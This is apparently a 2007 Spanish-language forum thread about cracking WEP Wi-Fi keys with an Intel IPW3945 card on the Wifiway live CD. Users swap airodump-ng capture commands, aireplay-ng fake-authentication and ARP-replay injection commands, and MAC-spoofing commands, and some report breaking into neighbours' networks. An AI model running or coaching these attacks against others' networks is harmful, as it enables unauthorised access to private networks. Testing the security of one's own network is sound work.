Cuando tu usas el airodump.. arriba te figuran los AP y sus caracteristicas y abajo, figuran los clientes que estan conectados a los AP.
Segun comentas, tu debes pillar a algun cliente conectado a un AP al cual no tienes señal suficiente, por eso no te figura su BSSID.
Y sobre el channel que indica el airodump.. no le hagas mucho caso que a veces se le va al pinza xD
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: 5hogo en 21-05-2007, 10:46 (Lunes)
Otra duda más.. :P
A que puede deberse que no capture ni un paquete ARP con algunas wifis si he sincornizado perfectamente a la primera con el AP y el RXQ siempre está entre 80 - 100??
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: dsalazar en 23-05-2007, 23:07 (Miércoles)
tengo una laptop con t. wireless interna 3945, utilizo el wifiway, y hago esto paso a paso, pero al hacer el airodump-ng rtap0 en el BSSID que detecta es la MAC addrress de un equipo que esta conectado a la red, y no veo el BSSID del AP, no el channel me marca 0, y se que esta en el 6, y el ESSID me dice: <length: 0>. por consiguiente ya no puedo hacer el aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0, al no tener el dato, a que se deberá?, espero que me puedan ayudar, soy nuevo en esto, saludos desde monterrey, mexico.

Cuando tu usas el airodump.. arriba te figuran los AP y sus caracteristicas y abajo, figuran los clientes que estan conectados a los AP.
Segun comentas, tu debes pillar a algun cliente conectado a un AP al cual no tienes señal suficiente, por eso no te figura su BSSID.
Y sobre el channel que indica el airodump.. no le hagas mucho caso que a veces se le va al pinza xD


esas pruebas las hice en mi casa con mi otra laptop estaban una junto a la otra, y con mi AP que yo si se cual es el BSSID, el cual no veo, estoy haciendo pruebas en mi casa, la cual la red es mia para ver como funciona bien esto y poder hacerlo ya afuera con otras personas.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: inlivetoday en 24-05-2007, 11:01 (Jueves)
Cuando intento hacer mousepad /sys/class/net/wifi0/device/channel me abre el editor pero cuando quiero guardar no me lo permite por no tener permiso. Pensaba que al entrar como root tendría permiso de escritura sin problemas pero me falla.
Alguien me podría decir que tengo que hacer??????? 

gracias.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: guanchito03 en 24-05-2007, 12:21 (Jueves)
He sacado dos claves pero luego ninguna de las dos redes me da direccion ip :(.
He usado el ethereal pero luego solo me da mi ip y no la del ap. El look lan tampoco me detecta nada. Ya no se q mas hacer, alguien me ayuda?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: unbas en 24-05-2007, 17:22 (Jueves)
Lo q tienes q hacer es capturar traffico con el airodump-ng en formato .cap y despues analizarlo, en teoria podrias sacar los protocolos con facilidad
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: rh3nt0n en 24-05-2007, 17:31 (Jueves)
Cuando intento hacer mousepad /sys/class/net/wifi0/device/channel me abre el editor pero cuando quiero guardar no me lo permite por no tener permiso. Pensaba que al entrar como root tendría permiso de escritura sin problemas pero me falla.
Alguien me podría decir que tengo que hacer??????? 

gracias.

prueba bajando la interfaz ..

Código: [Seleccionar]
ifconfig wifi0 down
echo <canal> > /sys/class/net/wifi0/device/channel
ifconfig wifi0 up

saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: *dudux en 25-05-2007, 13:10 (Viernes)
alguien podria decir la tasa de reinyeccion de las ipw3945?¿?¿

https://foro.seguridadwireless.net/index.php/topic,1649.0.html
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: SpaZz en 25-05-2007, 21:05 (Viernes)
Me funciono de fábula el paso a paso, obtuve 2 claves wep, la de mi red wireless para confirmar y la de otra red que esta a mi alcance, sin embargo, no pude navegar en ella, me decia que la red tenia poca conectividad o conectividad nula, eso me parecio. Sin embargo no me queda más que agradecer por tan valiosa herramienta y seguir investigando ya que me entusiasmo mucho este mundillo.

Un saludo a todo el equipo que hace posible esto, saludos desde Chile :-)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bochan en 27-05-2007, 12:24 (Domingo)
hola, cuando hago aireplay-ng -1 0 -a Bssid -h mac wifi0 -e essid wifi0, no me va, me pone "aireplay-ng - -help" for help.
 alguien podria ayudarme? gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bochan en 27-05-2007, 16:44 (Domingo)
hola otra vez, he conseguido que no me salga lo de antes, pero ahora me sale:
interface carlos:
ioctl (siocgifindex) failed: no such device
alguien puede ayudarme?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: bochan en 27-05-2007, 16:58 (Domingo)
hola sigue saliendome lo de aireplay-ng --help. ayudadme. gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: helmantico en 27-05-2007, 18:16 (Domingo)
hola a todos.

me acabo de bajar el wifiway a un cd.arranco y parece arrancar perfectamente.
El problema que tengo es que es como si no me reconociese la tarjeta wireles, poruqe no me aparece la carpeta wifi0.

si hago un iwconfig, solo me aparecen eth0 y lo.

tengo un portatil compaq presario v6000 con tarjeta intel 3945ABG.
¿Que podría hacer para que funcione?

ademas, cuando arancon en windoes xp funciona perfectamente, y tiene un boton que se pone en azul cuando la tarjeta wifi esta conectada, y en wifiway siempre esta en rojo.

Muchas gracias.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: sanchezdemedina en 27-05-2007, 22:27 (Domingo)
hola a todos.

me acabo de bajar el wifiway a un cd.arranco y parece arrancar perfectamente.
El problema que tengo es que es como si no me reconociese la tarjeta wireles, poruqe no me aparece la carpeta wifi0.

si hago un iwconfig, solo me aparecen eth0 y lo.

tengo un portatil compaq presario v6000 con tarjeta intel 3945ABG.
¿Que podría hacer para que funcione?

ademas, cuando arancon en windoes xp funciona perfectamente, y tiene un boton que se pone en azul cuando la tarjeta wifi esta conectada, y en wifiway siempre esta en rojo.

Muchas gracias.

hola pues no te preocupes a mi me pasaba lo mismo hasta que me di cuenta de que si que la detectaba, prueba a lanzar el airodump y seguro que te funciona.Despues simplemente sigue este maravilloso manual que esta de lujo.

De paso aprovecho y felicito a los creadores de todo esto que nos han facilitado mucho la cosa a todos!!!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: helmantico en 28-05-2007, 00:18 (Lunes)
Hola de nuevo.

Ante todo muchas gracias a sanchezdemedina por su respuesta.Efectivamente tenias razon, he ejecutado el airodump, y ya se ha puesto la lucecita en azul y ha aparecido el famoso wifi0 por ahi.

Pero entre que no entiiendo mucho y tal, tengo otro problemilla.

Pongo el canal a 11 como dice el manual, y ejecuto el airodump-ng rtap0.Aparece la pantallita, pero tras 20 minutos tirando, no aparece ningun BSISDN.¿Es normal?.

Segun windows hay asi como 4 routers al alcance y entre ellos el mio conectado.

Pero no me detecta nada por lo que no puedo continuar.

Muchas gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: canaya en 28-05-2007, 20:54 (Lunes)
A mi me suele pasar lo mismo y lo que suelo hacer es reiniciar la live, a veces funciona, si reinicio un par de veces y el airodump sigue sin pillarme nada borro el regrabable y lo vuelvo a quemar.
Hola de nuevo.

Ante todo muchas gracias a sanchezdemedina por su respuesta.Efectivamente tenias razon, he ejecutado el airodump, y ya se ha puesto la lucecita en azul y ha aparecido el famoso wifi0 por ahi.

Pero entre que no entiiendo mucho y tal, tengo otro problemilla.

Pongo el canal a 11 como dice el manual, y ejecuto el airodump-ng rtap0.Aparece la pantallita, pero tras 20 minutos tirando, no aparece ningun BSISDN.¿Es normal?.

Segun windows hay asi como 4 routers al alcance y entre ellos el mio conectado.

Pero no me detecta nada por lo que no puedo continuar.

Muchas gracias
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: emudem en 08-06-2007, 08:31 (Viernes)
Hola de nuevo.

Ante todo muchas gracias a sanchezdemedina por su respuesta.Efectivamente tenias razon, he ejecutado el airodump, y ya se ha puesto la lucecita en azul y ha aparecido el famoso wifi0 por ahi.

Pero entre que no entiiendo mucho y tal, tengo otro problemilla.

Pongo el canal a 11 como dice el manual, y ejecuto el airodump-ng rtap0.Aparece la pantallita, pero tras 20 minutos tirando, no aparece ningun BSISDN.¿Es normal?.

Segun windows hay asi como 4 routers al alcance y entre ellos el mio conectado.

Pero no me detecta nada por lo que no puedo continuar.

Muchas gracias

Lo del canal 11 no es general es simplemente un ejemplo, lo que deberias hacer es ejecutar tu sistema operativo por defecto y ver en que canal se encuentran los routers y poner ese canal.

Espero lo hayais entendido todos.

Un salu2  ;)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: lino en 10-06-2007, 20:23 (Domingo)
Por fin despues de unos dias leyendo en el foro y toda esta tarde intentando solucionar los problemas por fin lo consegui, muxas gracias a todos que la verdad todas las dudas que tuve me las solucionasteis. deus
Título: Paso a paso como inyectar con IPW3945
Publicado por: KuaSha en 11-06-2007, 21:23 (Lunes)
hola.....el tema es q no se como ejecutar el ethereal....me imagino q no esta incluido en el wifiway, como puedo hacerlo.


salu2.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: hadrianweb en 11-06-2007, 22:11 (Lunes)
abajo donde en la misma fila en la que esta el menu tienes el wiredshark que es lo mismo que el ethreal ;D ;D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: vinsed en 15-06-2007, 20:16 (Viernes)

Código:

ifconfig wifi0 up


Código:

ifconfig



Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr

Código:

aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0


todo me va bien hasta donde se pone "ifconfig" pero luego no entiendo la parte q dice "
Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr" osea q ahi copio la mac?, bueno de ahi me sale un error cuando pogo "aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0" me sale invalid ap mac address"

alguien q me ayude?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: alberion en 15-06-2007, 20:30 (Viernes)
debes de tener orden, siendo asi el comando:

aireplay-ng -1 0 -e ESSID -a MACAP -h TUMAC wifi0 y listo


saludos!  ;D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: vinsed en 15-06-2007, 20:45 (Viernes)
haber comenze otra vez por que me comi un paso y de hecho no entiendo aqui

Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.

Código:

airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0

el codigo lo pongo en la terminal? y lo pongo tal cual donde dice"CANAL DE AP" o ahi pongo el canal q en mi caso es el 6, igual en "FICHERO GUARDA" asi lo deo o q se pone ahi
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: alberion en 16-06-2007, 00:21 (Sábado)
TODO se hace en terminal

auqnue, la modificacion del rate/channel/bssid, se puede hacer de manera manual viajando a la  direccion en donde se encuentran y modificarlos como si fuera bloc de notas en windows

saludos]! ;D
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: vinsed en 16-06-2007, 00:24 (Sábado)
no hay respondido mi duda

Código:

airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0

se pone exactamente = o voy a cambiar el valor

Alguien me puede ir guiando por favor? alguna alma caritativa, no le voy a quitar mas de 2 minutos :(
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: alberion en 16-06-2007, 00:37 (Sábado)
airodump-ng -c 6 -w weba rtap0

airodump-ng es el programa
-c 6 indica el canal 6(que es en donde esta el tu ap)
-w weba indica que se escribirá (write) el archivo weba de las capturas
rtap0 es la interface de wifiway de captura

saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: vinsed en 16-06-2007, 00:44 (Sábado)
asi merito gracias voy a intentar en 3 minutos posteo si quedo
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: vinsed en 16-06-2007, 01:20 (Sábado)
ok mira es q yaprove pero nada, me sigue saliendo invalid mac creo q mi problema esta aqui

digo:

mousepad /sys/class/net/wifi0/device/bssid


Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay incompatibilidades si cerramos.

Código:

airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0

cuando hago "mousepad /sys/class/net/wifi0/device/bssid" se abre el bssid y ahi pongo la mac" guardo pero no cierro por q hay dice q nohay q cerrar, ok me regreo a la misma terminal pongo

Código:
airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0

le doy enter y no pasa nada, luego viene abrir otra terminal, asi lo estoy haciendo bien?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: *CaLeB* en 21-06-2007, 17:36 (Jueves)
Hola, estoy probando el tutorial con un router Dlink que tengo en casa (es de mi propiedad), por lo tanto puedo afirmar que no tiene filtrado mac y lleva una clave wep.
Bien dispongo de una ipw3945 y he seguido el tutorial al pie de la letra, todo correcto, pero cuando hago la reinyeccion de paquetes, no suben ni los ni los ARP ni los paquetes enviados.
Aparte de mi equipo no hay mas clientes asociados, lo cual creo que puede ser el problema, pues no se genera trafico. He probado con el ataque 1 (fake asociation) pero no se como hacer spoof a la mac.
Pero el caso es que aparezco asociado y se ve en airodump como suben los pakets pero no la data.
He probado con:
Citar
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up
Cambiando "ath0" por wifi0 pero me da error y no me deja cambiar la mac
Por favor si pueden ayudarme estaria muy agradecido, como soy novato si no me he explicado bien preguntad por favor.
Muchas gracias.

PD: ¿Puede tener algo que ver que el DHCP este conectado o no?
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: KuaSha en 21-06-2007, 21:21 (Jueves)
yo quisera saber si el cambio d la mac solo se puede hacer en wifiway... o tambien se puede en windows.

En mi caso con los ARP, me pasa q suben de 3 en 3 y cada 5 seg. esto es normal ?
Cual seria el minimo de capturas de los ARP para poder lanzar el aircrack... y x ultimo ,
se puede lanzar el aircrack varias veces seguidas....me explico :
Terminal 1 : con 3000 ARP...... sigue corriendo
Terminal 2 : 1 vez lanzo el aircrack, negativo
Terminal 1 : con 4000 ARP...... sigue corriendo
Terminal 2 : 2 vez lanzo el aircrack, negativo
Terminal 1 : con 5000 ARP...... sigue corriendo
Terminal 2 : 3 vez lanzo el aircrack, negativo
Terminal 1 : con 6000 ARP...... sigue corriendo
Terminal 2 : 4 vez lanzo el aircrack, negativo

y asi, hasta q encuentre algo, estaria bien.

salu2.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: chrfer en 22-06-2007, 16:24 (Viernes)
Buenas a todos
Tengo el wifiway corriendo correctamente desde un pen driver.
Bootea sin problemas.
Puedo correr el modo grafico sin problemas.
Airodump corre sin problemas.
Aireplay autentica sin problemas y veo que se autentico en el Airodump.
Aireplay comienza a inyectar o asi parece, no veo en ningun momento que suba ARP.
Aireplay desautentica sin problemas.
Hasta aca todo bien, pero nunca suben ARP.
Alguien sabe Why?????
Segui el video al pie de la letra utilizando MIS MAC ADDRESS.
Todo el procedimiento lo hice dentro del X como en el modo terminal.

Saludos!! Gracias por la pronta respuesta
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: chrfer en 22-06-2007, 16:29 (Viernes)
Buenas a todos
Tengo el wifiway corriendo correctamente desde un pen driver.
Bootea sin problemas.
Puedo correr el modo grafico sin problemas.
Airodump corre sin problemas.
Aireplay autentica sin problemas y veo que se autentico en el Airodump.
Aireplay comienza a inyectar o asi parece, no veo en ningun momento que suba ARP.
Aireplay desautentica sin problemas.
Hasta aca todo bien, pero nunca suben ARP.
Alguien sabe Why??
Segui el video al pie de la letra utilizando MIS MAC ADDRESS.
Todo el procedimiento lo hice dentro del X como en el modo terminal.

Me olvidaba un dato todo esto lo estoy probando en un router Encore de mi propiedad, esta configurado standart con WEP64bits sin filtros de mac address, etc etc.

Algo que note distinto de mi procedimiento al de video, es que el del video en algun momento se autentica una segunda mac address a demas de la que se esta utilizando para el ataque

Saludos!! Gracias por la pronta respuesta
 
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: *CaLeB* en 22-06-2007, 17:28 (Viernes)
Bueno, he seguido investigando y no consigo dar con el fallo pero me he dado cuenta de que cuando uso
Citar
aireplay-ng -1 0 -e SSID -a mac_ap -h mi_mac wifi0
me asocia y autentifica bien pero cuando pongo
Citar
aireplay-ng -1 30 -e SSID -a mac_ap -h mi_mac wifi0
hace lo siguiente: asocia, autentifica y despues sale "sending keeping alive pakets" y despues intenta asociar de nuevo y no lo consigue, se queda parado, ni da error, ni nada, solo se para y no asocia.
Por favor si alguien puede ayudarme se lo agradeceria.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: the_often en 22-06-2007, 17:47 (Viernes)
A ver, para todos los que estais intentando inyectar SIN clientes:

Me 'cansa' un poco que siempre se pregunte lo mismo, pero bueno, lo volveré a repetir una vez mas:

Al hacer un A1, en principio con qe nos dé una vez lo de association successfull :-) pues ya vale, aunque si lo dejamos que continue asociandose pues mejor.

Segundo: hay que hacer a la vez en otra ventana un A3.

Tercero. Lo de siempre: QUE LO NORMAL ES QUE TARDE BASTANTE TIEMPO EN FUNCIONAR (a veces 10 minutos o a veces 2 horas).  Y QUE LO MEJOR ES INTENTARLO VARIAS VECES O EN DIFERENTES MOMENTOS, PORQUE A LA PRIMERA NO SIEMPRE FUNCIONA.

Y que depende de la señal, del chipset de la tarjeta que tengamos, y sobre todo DEL MODELO DEL ROUTER.  Si es muy nuevo, es proobable que ya este protegido contra atakes SIN clientes.

Entonces lo mejor es esperar a que haya un cliente.



Para KuaSha: confundes conceptos:

Necesitas como minimo a partir de 200.000 IVs para lanzar el aircrack normal, y para el aircrack.ptw a partir de 40.000 IVS.



Saludos!!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: *CaLeB* en 22-06-2007, 22:33 (Viernes)
Yo lo he hecho varias veces y a diferentes momentos del dia, pero como solo estoy yo no puedo poner clientes y no se asocia nadie mas que yo.
Pero tambien lo he probado en casa de un amigo con su router y aunque en su casa si habia trafico, teniamos dos pcs, al asociarme y al inyectar paquetes no pasaba nada de nada.
Creo que el problema lo tengo en la asociacion, aunque segun lo que pone en pantalla es satisfactoria.
No se donde lo hago mal.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: the_often en 22-06-2007, 22:40 (Viernes)
Si hay clientes entonces no tienes que asociarte tu.  Solamente usar el cliente conectado para inyectar trafico rapidamente.  Con clientes todo suele ser mucho mas facil.

Lee sobre atakes CON clientes.


Saludos
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: *CaLeB* en 23-06-2007, 00:29 (Sábado)
Acabo de hacer una ultima prueba y ha estado 1 hora, me he estado fijando en airodump y en la parte de abajo (donde pone los clientes asociados) cuando he hecho la asociacion y mientras que lo he estado los paquetes (sigo refiriendome a la parte de abajo) solo aumentaban cuando me reasociaba, uso el comando:
Citar
aireplay-ng -1 10 -e ssid -a mac_ap -h mi_mac wifi0
porque si no, al rato me desasocia. Tambien me he fijado que donde pone mi cliente asociado en la parte donde pone SSID, no sale el nombre del SSID al que me asocio.
Para el ataque 3 uso:
Citar
aireplay-ng -3 -b mac_ap -h mi_mac wifi0
Todo lo suelo hacer habiendo falsificado la mac con:
Citar
ifconfig wifi0 down
             macchanger -m mac_nueva wifi0
             ifconfig wifi0 up
Si veis algun error decidmelo, tambien cambio el BSSID (guardo pero no cierro, por si hay conflictos), el canal (por el canal donde se encuentra el ap) y el rate lo pongo en 2.

PD: Las ultimas pruebas las estoy haciendo en un router D-Link y con mi ipw3945,   el RXQ no baja de 90 y sigue todo igual.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: the_often en 23-06-2007, 01:25 (Sábado)
Acabo de hacer una ultima prueba y ha estado 1 hora, me he estado fijando en airodump y en la parte de abajo (donde pone los clientes asociados) cuando he hecho la asociacion y mientras que lo he estado los paquetes (sigo refiriendome a la parte de abajo) solo aumentaban cuando me reasociaba, uso el comando:
Citar
aireplay-ng -1 10 -e ssid -a mac_ap -h mi_mac wifi0
porque si no, al rato me desasocia. Tambien me he fijado que donde pone mi cliente asociado en la parte donde pone SSID, no sale el nombre del SSID al que me asocio.

TODO LO QUE HAS DICHO HASTA AQUI ES NORMAL, ESTÁ TODO OK.



Para el ataque 3 uso:
Citar
aireplay-ng -3 -b mac_ap -h mi_mac wifi0
Todo lo suelo hacer habiendo falsificado la mac con:
Citar
ifconfig wifi0 down
             macchanger -m mac_nueva wifi0
             ifconfig wifi0 up
Si veis algun error decidmelo, tambien cambio el BSSID (guardo pero no cierro, por si hay conflictos), el canal (por el canal donde se encuentra el ap) y el rate lo pongo en 2.

PD: Las ultimas pruebas las estoy haciendo en un router D-Link y con mi ipw3945,   el RXQ no baja de 90 y sigue todo igual.

Lo haces todo OK creo yo, pero es lo de siempre, la inyeccion sin clientes suele tardar, y con algunos routers no funciona (los nuevos sobre todo).

Auque para que la gente no se desanime quiero decir que a mi me ha funcionado en la mayoria de casos (aunque no en todos).

Prueba tambien haciendo primero el A3 y luego el A1.



Saludos

Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: semilla_sx en 23-06-2007, 15:57 (Sábado)
Como dice de The_often,Segir insistiendo pero un A3 sin clientes cuesta(quien algo quiere algo le cuesta):Para hacer saltar los Arp tengo un comentario en otro tema de este foro que a mi y a mis alrededores nos funciona,es insistencia.

Si se desasocia mira la lejania del otro router seguro ke no supera los 30 rqx en algun pico por eso cae.

Paciencia,despacito y buena letra¡¡(en el fondo es facil ya lo pillareis)

p.D.

Tened muy en cuenta la lejania o cercania del moden a la hora de pillar arp,no se le da muxa importancia pero creo ke es de lo que mas tiene.Chao¡saludo hadrianweb y a todos¡
 ;D 8) ::) :-*
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: -xavi- en 30-07-2007, 00:01 (Lunes)
Muy buenas,

llevo días leyendo un poco este foro y algun otro que trata sobre wireless. El tema es que me he quedado sin adsl en casa porque se me ha muerto el modem y con el portátil veo que algún vecino tiene una red inalámbrica.

Mi tarjeta es una intel pro set wireless 3945 abg. Al principio de tener el portátil me frustré porque me dijeron que con esta no podía husmear otras redes, pero con el wifiway seguí los pasos y logré sacar la contraseña para conectarme a la wireless del vecino (13 caracteres ascii).

El tema es que no se si falla algo, pero no puedo acceder a ninguna página web. Yo diría que la contraseña está bien, porque si la cambio me aparece "conectividad limitada o nula". La señal, es "buena" y la IP que me coge el portatil esta dentro del rango de la del router creo...

He leído algo sobre filtrado de MAC's... o puede ser otra cosa que he hecho mal o que no he hecho?

Disculpad las molestias si esto no iba aquí o si ya estaba respondido, pero me pareció el post adecuado  :P

Gracias!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: the_often en 30-07-2007, 08:32 (Lunes)
Hola -xavi-.

Bienvenido al foro ante todo! ;)

He de decirte que, al contrario que en otros posibles foros, es bueno que sepas que el objetivo de este foro es la seguridad de las redes wifi, y por orden de los 'jefes' del foro, aqui no se dará soporte ni se ayudará directamente para conectarse a las redes de los vecinos.


Un saludo!
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: juanjetomas en 30-07-2007, 08:33 (Lunes)
Para empezar, el A1 + A3 está bien, pero yo probando, logré hacer el a. fragmentación, y es mucho mejor (a mi ver) y más rápido. Lo hice con airoway, claro está, que sinplifica mucho el proceso. Si alguien está interesado por saber como se hace, que lo diga, y lo explico.  ;D ;D ;D

Salu2

PD:Viva la fragmentación xD
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: -xavi- en 30-07-2007, 19:39 (Lunes)
bueno, mas o menos me lo pensaba, asi que tampoco quise preguntar mucho. Supongo que se trata de irse apañando leyendo los tutoriales y tal   :D

De todas formas gracias por todo!

nos leemos!!  8)
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: LievenX en 10-08-2007, 12:06 (Viernes)
Una cuestion acerca de recibir ARP durante la captura , en el tutorial decis lo siguiente:

Citar
Código:

aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0


Esperamos un rato como mucho 15 minutos y vereis como suben los ARP.

El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el AP0 pero no lo he probado.


Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1

Código:

aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0


Y lo ejecutais de nuevo hasta que os autentifique o se os suban los ARP.


Pero yo he seguido los pasos y no me aumenta el numero de ARP siendo 0 el valor que constantemente me da... Por que se puede deber esto ? Es posible que no tenga clientes el AP atacado y por eso no aumenta el valor de ARP en pantalla ?

Gracias socios por la ayuda,
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: crareval en 16-08-2007, 19:37 (Jueves)
Hola La verdad es que soy nuevo en el mundo de redes, y como me an comentado varios amigo  no entendemos muchas cosas por ejemplo  que datos ingresar cuando ustedes colocan los codigos, seria bueno que dieran un ejemplo mas explicativo y mas llevado a nivel bajo de conocimientos de redes.

por ejemplo

airodump-ng -c CANAL DEL AP -w FICHERO GUARDA IVS rtap0

a que se refieren co canal de AP  y fichero Guarda IVS

ojala alguien me pueda ayudar y veran que esta ayuda le servira a muchas personas que estan en la misma situacion mia.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: holas en 16-08-2007, 20:02 (Jueves)
El -c... hace referencia al canal y en -w lo que tienes que poner es el nombre del fichero en que se guardará. Saludos.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: serengehtti en 17-08-2007, 18:17 (Viernes)
Hola a todos. Llevo días probando la ipw3945 y bueno, unas veces mal y otras regular. Estoy en el punto en el que parece que inyecta, pero a pesar de capturar ARPs el número de paquetes por segundo es bastante lento con lo cual los IVs suben muy lentos. Veo vídeos que suben a tasas de cientos de pps, pero yo no paso de 30 ó 40. En apariencia, las condiciones de señal, etc. son buenas, me he asociado bien a la primera, pero es muy, muy lento. Además, las estaciones que están conectadas al AP se desconectan en cuanto empiezo a inyectar. ¿Es esto normal, lo de que se desconecten los clientes "auténticos"? Si es así es difícil pasar inadvertido :-) De momento las pruebas son en un entorno mío, así que no pasa nada.

Muchas gracias por aniticipado.
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ton67 en 22-08-2007, 19:05 (Miércoles)

Buenas a ver si algun coleguilla me pudiera echar un cable-less  ;D

Tengo un portatil compaq presario V6000 y al arrancar desde el cd wifiway, todo correcto, arranca desde cd y despues pone inciando linux y tal, pero tres lineas despues la pantalla se queda en negor y no se ve nada mas, despues de 1 minuto todo se para, cd discos duros etc, y no hace anda mas, se queda en negro, curiosamente si pulsas intro lee el cd un ratoy  depsues para para quedarse como en todo momento en negro

que puede ser? puede ser q al tener la pantalla esta alargada no la detecta wifiwy y no se ve nada? alguno me puede echar un cable-less???

Venga que tengo ganas de ponerme a hacer cosillas como vosotros  :P

gracias por adelantado

bor


hola a mi me pasa exactamente lo mismo que a ti. no encuentro solución llevo una semana dandole vueltas primero con wifislax ahora con wifiway y ya me estoy derrotando.  :'( :'( :'(
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: indio99 en 22-08-2007, 21:37 (Miércoles)

Buenas a ver si algun coleguilla me pudiera echar un cable-less  ;D

Tengo un portatil compaq presario V6000 y al arrancar desde el cd wifiway, todo correcto, arranca desde cd y despues pone inciando linux y tal, pero tres lineas despues la pantalla se queda en negor y no se ve nada mas, despues de 1 minuto todo se para, cd discos duros etc, y no hace anda mas, se queda en negro, curiosamente si pulsas intro lee el cd un ratoy  depsues para para quedarse como en todo momento en negro

que puede ser? puede ser q al tener la pantalla esta alargada no la detecta wifiwy y no se ve nada? alguno me puede echar un cable-less???

Venga que tengo ganas de ponerme a hacer cosillas como vosotros  :P

gracias por adelantado

bor


hola a mi me pasa exactamente lo mismo que a ti. no encuentro solución llevo una semana dandole vueltas primero con wifislax ahora con wifiway y ya me estoy derrotando.  :'( :'( :'(

prueba con los cheatcodes,
escribe acpi=off, antes de empezar a iniciar el cd
suerte
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: ton67 en 24-08-2007, 01:39 (Viernes)

Citar
hola a mi me pasa exactamente lo mismo que a ti. no encuentro solución llevo una semana dandole vueltas primero con wifislax ahora con wifiway y ya me estoy derrotando.  :'( :'( :'(


prueba con los cheatcodes,
escribe acpi=off, antes de empezar a iniciar el cd
suerte


hola indio99 gracias por contestar, esto mismo es lo que he intentado, pues es como se soluciona este fallo en wifislax, pero la pega (tal vez parezca una chorrada) es que cuando comienza a andar el programa y aparece ...boot: trato de escribirlo pero solo puedo escribir hasta ....acpi, pues el simbolo = que se pone pulsando mayusculas+0 no lo puedo escribir, pues al pulsar me aparece un simbolo asi..) un parentesis cerrado. no se como puedo solucionar esto, si se os ocurre como os agradezco que me lo comuniqueis !!
muchas gracias !! :'( :'(
Título: Re: Paso a paso como inyectar con IPW3945
Publicado por: indio99 en 24-08-2007, 09:43 (Viernes)

Citar
hola a mi me pasa exactamente lo mismo que a ti. no encuentro solución llevo una semana dandole vueltas primero con wifislax ahora con wifiway y ya me estoy derrotando.  :'( :'( :'(


prueba con los cheatcodes,
escribe acpi=off, antes de empezar a iniciar el cd
suerte

hola indio99 gracias por contestar, esto mismo es lo que he intentado, pues es como se soluciona este fallo en wifislax, pero la pega (tal vez parezca una chorrada) es que cuando comienza a andar el programa y aparece ...boot: trato de escribirlo pero solo puedo escribir hasta ....acpi, pues el simbolo = que se pone pulsando mayusculas+0 no lo puedo escribir, pues al pulsar me aparece un simbolo asi..) un parentesis cerrado. no se como puedo solucionar esto, si se os ocurre como os agradezco que me lo comuniqueis !!
muchas gracias !! :'( :'(

a ver, sonará burro, pero en mis tiempos mozos, batallando con ms-dos (tendría 8 o 10 años), siempre estaba probando cosas (logicamente me petaba el sistema) y habia veces que iniciaba con disco de arranque que no tenia el archivo keybsp, bueno pues el teclado estaba todo cambiado, para cambiar de unidad no podia poner c:, ya que salia otro caracter, tenía que escribir cÑ, y así salian los dos puntos,

